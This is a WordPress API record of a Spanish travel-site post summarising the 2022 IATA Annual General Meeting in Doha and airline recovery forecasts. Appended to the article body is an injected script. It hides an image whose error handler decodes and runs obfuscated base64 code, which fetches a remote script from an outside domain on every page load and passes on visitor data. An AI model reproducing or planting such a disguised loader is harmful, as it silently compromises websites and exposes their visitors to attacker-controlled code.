{"id":5432,"date":"2022-06-26T21:07:55","date_gmt":"2022-06-27T00:07:55","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5432"},"modified":"2025-08-13T16:18:04","modified_gmt":"2025-08-13T19:18:04","slug":"la-aviacion-comercial-abre-una-era-con-nuevos-desafios-por-delante","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5432","title":{"rendered":"La aviaci\u00f3n comercial abre una era con nuevos desaf\u00edos por delante"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg\" alt=\"\" class=\"wp-image-5399\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h5 class=\"has-vivid-purple-background-color has-background wp-block-heading\">La 78.\u00aa Reuni\u00f3n General Anual de la IATA y la Cumbre Mundial del Transporte A\u00e9reo se llev\u00f3 a cabo en Doha, Qatar\u00a0del 19 al 21 de junio. Unos 1000 ejecutivos de aerol\u00edneas, funcionario de gobiernos, partes interesadas y socios estrat\u00e9gicos debatieron sobre temas candentes<\/h5>\n\n\n\n<p>La Asociaci\u00f3n Internacional de Transporte A\u00e9reo (IATA) organiz\u00f3 la&nbsp;78.\u00aa Reuni\u00f3n General Anual (AGM) y la Cumbre Mundial del Transporte A\u00e9reo (WATS)&nbsp;con Qatar Airways&nbsp;como&nbsp;la aerol\u00ednea anfitriona.<\/p>\n\n\n\n<p>El evento se realiz\u00f3 del 19 al 21 de junio y atrajo a los l\u00edderes m\u00e1s importantes de la industria de entre las 290 aerol\u00edneas miembros de IATA, as\u00ed como a los principales funcionarios gubernamentales, socios estrat\u00e9gicos, proveedores de equipos y medios de comunicaci\u00f3n.<\/p>\n\n\n\n<p>\u201cDoha se converti\u00f3 en la capital mundial de la aviaci\u00f3n. Las aerol\u00edneas se est\u00e1n recuperando simult\u00e1neamente de la crisis del COVID-19, marcando el camino para lograr cero emisiones netas de carbono para 2050, trabajando para mejorar la diversidad de g\u00e9nero y adapt\u00e1ndose a un entorno geopol\u00edtico que est\u00e1 experimentando su mayor impacto en durante tres d\u00e9cadas\u201d, dijo Willie Walsh, Director General de IATA.<\/p>\n\n\n\n<p>El Director Ejecutivo del Grupo Qatar Airways, Su Excelencia el Sr. Akbar Al Baker, dijo: \u201cEs un privilegio absoluto haber hospedado a nuestros socios de la industria en la ciudad natal de Qatar Airways, particularmente durante nuestro hito 25&nbsp;a\u00f1os&nbsp;de operaciones.&nbsp;Reunirnos cara a cara nos brinda la oportunidad de discutir las lecciones aprendidas de nuestros \u00faltimos a\u00f1os durante la pandemia, los problemas globales que nos afectan a todos aqu\u00ed y ahora, y planificar el mejor camino a seguir para la industria\u201d.<\/p>\n\n\n\n<p>Cumbre Mundial del Transporte A\u00e9reo<br>El WATS se abri\u00f3 inmediatamente despu\u00e9s de la AGM.&nbsp;Un punto destacado ha sido la tercera edici\u00f3n de los Premios a la Diversidad e Inclusi\u00f3n patrocinados por Qatar Airways.&nbsp;Estos galardones&nbsp;reconocen a organizaciones e individuos que marcan la diferencia ayudando a impulsar la iniciativa 25by2025 de la industria para hacer que la industria de la aviaci\u00f3n sea m\u00e1s equilibrada en cuanto al g\u00e9nero.<\/p>\n\n\n\n<p>El WATS tambi\u00e9n cont\u00f3 con el popular CEO Insights Panel moderado por Richard Quest de CNN y con Adrian Neuhauser, CEO de Avianca, Pieter Elbers, CEO de KLM, Akbar Al Baker, director ejecutivo del grupo, Qatar Airways y Jayne Hrdlicka, CEO de Virgin Australia.<\/p>\n\n\n\n<p>Adem\u00e1s de la perspectiva econ\u00f3mica actualizada de la industria, los temas clave que se abordaron incluyeron: la guerra en Ucrania y sus implicaciones para el mundo globalizado,&nbsp;los desaf\u00edos para lograr la sostenibilidad, asignar la escasa capacidad aeroportuaria y garantizar el transporte seguro de bater\u00edas de litio.<\/p>\n\n\n\n<p>Esta ha sido la cuarta AGM realizada en el Medio Oriente. \u201cDesde la \u00faltima vez que estuvimos en Doha, la regi\u00f3n no ha hecho m\u00e1s que aumentar su importancia para la conectividad mundial.&nbsp;Seg\u00fan las cifras m\u00e1s recientes, las aerol\u00edneas de la regi\u00f3n representan el 6,5% del tr\u00e1fico internacional mundial de pasajeros y el 13,4% de los movimientos de carga.&nbsp;Gran parte de este crecimiento ha ocurrido en la regi\u00f3n del Golfo, como lo tipifica nuestra aerol\u00ednea anfitriona\u201d, dijo Walsh.<\/p>\n\n\n\n<p>Signos claros de recuperaci\u00f3n<br>IATA&nbsp;anunci\u00f3 una actualizaci\u00f3n de su perspectiva para el desempe\u00f1o financiero de la industria de las aerol\u00edneas en 2022 a medida que se acelera el ritmo de recuperaci\u00f3n de la crisis de COVID-19.&nbsp;Los puntos destacados del pron\u00f3stico incluyen:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Se espera que las p\u00e9rdidas de la industria se reduzcan a -9700 millones de d\u00f3lares (mejor que el pron\u00f3stico de octubre de 2021 de una p\u00e9rdida de 11600 millones de d\u00f3lares) para un margen de p\u00e9rdida neta de -1,2 %.&nbsp;Esa es una gran mejora con respecto a las p\u00e9rdidas de $ 137,7 mil millones (-36,0 % de margen neto) en 2020 y $ 42,1 mil millones (-8,3 % de margen neto) en 2021.<\/li><li>La rentabilidad de toda la industria en 2023 parece estar al alcance de la mano y ya se espera que Am\u00e9rica del Norte genere una ganancia de $ 8.8 mil millones en 2022.<\/li><li>Las ganancias de eficiencia y la mejora de los rendimientos est\u00e1n ayudando a las aerol\u00edneas a reducir las p\u00e9rdidas incluso con el aumento de los costos de mano de obra y combustible (este \u00faltimo impulsado por un aumento de +40 % en el precio mundial del petr\u00f3leo y una expansi\u00f3n del crack cada vez mayor este a\u00f1o).<\/li><li>El optimismo y el compromiso de la industria con la reducci\u00f3n de emisiones son evidentes en la entrega neta esperada de m\u00e1s de 1200 aviones en 2022.<\/li><li>La fuerte demanda reprimida, el levantamiento de las restricciones de viaje en la mayor\u00eda de los mercados, el bajo desempleo en la mayor\u00eda de los pa\u00edses y la expansi\u00f3n de los ahorros personales est\u00e1n impulsando un resurgimiento de la demanda que har\u00e1 que el n\u00famero de pasajeros alcance el 83 % de los niveles previos a la pandemia en 2022.<\/li><li>A pesar de los desaf\u00edos econ\u00f3micos, se espera que los vol\u00famenes de carga alcancen un r\u00e9cord de 68,4 millones de toneladas en 2022.<\/li><\/ul>\n\n\n\n<p>\u201cLas aerol\u00edneas son resilientes.&nbsp;La gente est\u00e1 volando en cantidades cada vez mayores.&nbsp;Y la carga est\u00e1 funcionando bien en un contexto de creciente incertidumbre econ\u00f3mica.&nbsp;Las p\u00e9rdidas se reducir\u00e1n a $ 9.7 mil millones este a\u00f1o y la rentabilidad est\u00e1 en el horizonte para 2023. Es un momento para el optimismo, incluso si todav\u00eda hay desaf\u00edos en los costos, particularmente el combustible, y algunas restricciones persistentes en algunos mercados clave\u201d, dijo Willie. Walsh, director general de la IATA.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/es.travel2latam.com\/nota\/74968-reportes-la-aviacion-comercial-abre-una-era-con-nuevos-desafios-por-delante.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/06\/travel2latam.logo_.gif\" alt=\"\" class=\"wp-image-4477\" width=\"102\" height=\"39\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La 78.\u00aa Reuni\u00f3n General Anual de la IATA y la Cumbre Mundial del Transporte A\u00e9reo se llev\u00f3 a cabo en Doha, Qatar\u00a0del 19 al 21 de junio. Unos 1000 ejecutivos de aerol\u00edneas, funcionario de gobiernos, partes interesadas y socios estrat\u00e9gicos debatieron sobre temas candentes La Asociaci\u00f3n Internacional de Transporte A\u00e9reo (IATA) organiz\u00f3 la&nbsp;78.\u00aa Reuni\u00f3n General [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5433,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29],"tags":[],"class_list":["post-5432","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5432"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5432\/revisions"}],"predecessor-version":[{"id":10648,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5432\/revisions\/10648"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5433"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}